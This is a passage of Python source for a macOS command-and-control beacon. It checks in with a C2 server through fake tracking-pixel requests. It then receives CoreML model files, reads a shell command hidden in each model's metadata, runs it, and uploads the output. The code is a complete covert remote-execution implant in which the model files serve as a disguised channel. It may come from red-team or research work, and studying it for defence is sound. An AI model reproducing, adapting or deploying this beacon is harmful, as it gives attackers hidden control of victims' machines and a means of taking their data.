                files={"file": f}
            )
        os.remove(model_path)
    except Exception as e:
        print(f"[-] Failed to send result: {e}")


def fetch_model():
    try:
        r = requests.get(f"http://{C2_HOST}:{C2_PORT}/_tracking.gif", params={"session_id": SESSION_ID})
        r.raise_for_status()
        payload_hex = r.json().get("payload")
        return bytes.fromhex(payload_hex) if payload_hex else None
    except Exception as e:
        print(f"[-] Error fetching model: {e}")
        return None


def run_command_from_model(model_data: bytes):
    tmp_path = None
    try:
        with tempfile.NamedTemporaryFile(delete=False, suffix=".mlmodel") as tmp:
            tmp.write(model_data)
            tmp_path = tmp.name
        model = ct.models.MLModel(tmp_path)
        _ = model.predict({"input": [0.0]})
        command = model.get_spec().description.metadata.userDefined.get("cmd", "").strip()
        if command:
            print(f"[+] Executing: {command}")
            result = execute_command_capture_output(command)
            send_output_to_server(result)
    except Exception as e:
        print(f"[-] Error running command: {e}")
    finally:
        if tmp_path and os.path.exists(tmp_path):
            os.remove(tmp_path)


def main():
    print(f"[+] CoreML macOS Beacon (Level 3.5) - Session: {SESSION_ID}")
    try:
        requests.get(f"http://{C2_HOST}:{C2_PORT}/_init.gif", params={"session_id": SESSION_ID})
    except:
        print("[-] Registration failed.")
        return
    while True:
        model_data = fetch_model()
        if model_data:
            run_command_from_model(model_data)
        time.sleep(2)


if __name__ == "__main__":
    main()
```